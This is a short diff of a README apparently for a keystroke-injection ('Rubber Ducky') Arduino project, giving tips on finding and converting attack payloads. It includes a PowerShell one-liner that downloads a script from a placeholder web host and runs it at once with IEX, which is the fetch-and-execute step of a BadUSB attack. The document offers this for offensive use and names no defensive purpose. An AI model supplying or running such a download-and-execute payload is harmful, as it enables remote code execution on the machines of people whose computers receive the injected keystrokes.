datasnoken/duckies/README.md

 ## Tips

+### More payloads
+Google "Rubber Ducky Payloads" -> Convert them to arduino sketches -> Don't forget to change the keyboard layout -> Verify + Compile

-Find a way to do it in Powershell, and run the script from the web as so:
+### Find a way to do it in Powershell, and run the script from the web as so:

 `IEX ((New-Object System.Net.Webclient).DownloadString(\"YOUR_SCRIPT_HOSTED_ON_SOME_SITE_AS_RAW\")); exit`